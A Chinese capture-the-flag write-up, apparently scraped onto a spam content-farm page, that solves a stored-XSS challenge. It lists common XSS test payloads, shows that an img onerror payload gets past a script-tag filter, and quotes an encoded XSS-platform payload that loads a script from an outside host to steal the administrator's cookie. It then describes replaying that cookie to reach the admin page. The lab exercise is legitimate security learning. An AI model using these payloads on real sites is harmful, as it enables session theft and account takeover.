当前位置: 首页 > news >正文

广州网站推广工具联合年检怎么做网站上

广州网站推广工具,联合年检怎么做网站上,wordpress会员积分,建设网站的 成本进入靶场 左边是吐槽,右边是登录,先登录试试 admin 123456 admiin# 123456 admin"# 123456 不玩了,先去回顾下xss 回顾完就很尴尬了,我居然用SQL的知识去做xss的题 重来 吐槽这里有一个输入框,容易出现存储型…

进入靶场

左边是吐槽,右边是登录,先登录试试

admin 123456

admiin'# 123456

admin"# 123456

不玩了,先去回顾下xss

回顾完就很尴尬了,我居然用SQL的知识去做xss的题

重来

吐槽这里有一个输入框,容易出现存储型xss漏洞

 

常见的xss payload如下:

 

<script>alert(1)</script>

"><script>alert(1)</script><"

<img src=# onerror=alert(1)>

<svg onload=alert(1)>

都试试

1,<script>alert(1)</script>

访问的时候什么都没有,失败

2,"><script>alert(1)</script><"

根据以上两次尝试,知script被过滤了

3,<img src=# onerror=alert(1)>

出现弹窗1,注入成功

进入xss测试平台XSS平台-XSS测试网站-仅用于安全免费测试

之前没用过,先注册

登录成功

点击左边的创建项目,随便写一个名称

再点击左边的我的项目,右上角的查看配置代码

复制了这个

<img src=c onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtib2R5LmFwcGVuZENoaWxkKHMpO3Muc3JjPScvL3hzLnBlLzV6Vyc7'))>

但是我的xss平台项目里一直不显示记录(很崩溃啊,想换其他的xss平台,结果都被禁了)

不过得到记录后便会知道backend/admin.php和管理员cookie

 

出现这个页面是我没改cookie

可是我也不知道cookie呀

改cookie就用BP抓包,发送到重放器,在请求里改

就知道flag了

 

 

 

 

 

 

 

 

 

http://www.yayakq.cn/news/478907/

相关文章:

  • 企业网站开发文档wordpress修改手机端幻灯片
  • 西安建站系统apache搭建wordpress
  • 网站建设的五大原则织梦文章title怎么显示网站title
  • 网站无法访问网站开发 运维 招投标
  • 企业网站建设方案包含泰安的网络建设公司
  • 专业的网站制作公司网站建设推荐乐云seo
  • 西宁高端网站开发公司企业网站怎么做seo优化
  • 深圳做网站三网合一上海十大营销策划公司排名
  • 企业网站建设费用详情seo推广是什么意怿
  • 上海做网站的公司官网拉米拉网站建设
  • 哪个网站可以代做试题国内网店平台有哪些
  • 成都旅游网站建设规划方案做系统网站好
  • 龙岩城乡建设局网站网站建设模板制作
  • 陕西住房与城乡建设厅网站梁头网站建设
  • 企业建设网站的目标wordpress专题页面
  • 有口碑的南通网站建设建设网站的目的以及意义
  • 网站文件夹目录结构外国购物平台网站大全
  • 建设银行 产品管理中心网站如何做网页推广如何做网页
  • 海南建设监理协会网站比较大气的企业网站
  • 咸宁商城网站建设公司网站建设说明书
  • 流量型网站网站打开速度变慢
  • 招远网站建设多少钱上海网络推广方式
  • 排名好的网站开发wordpress设置cdn缓存过期配置
  • 甘肃系统建站怎么用网站网络优化服务
  • 长沙建网站理wordpress调用目录
  • 做网站公司如何赚钱家具网站建设策划方案
  • 制作企业网站价格源码网站建设步骤
  • 怎样局域网站建设需要建设一个什么样的网站
  • 上海网站营销seo网站的链接建设
  • 用js做的个人酷炫网站网站放到iis如何做指向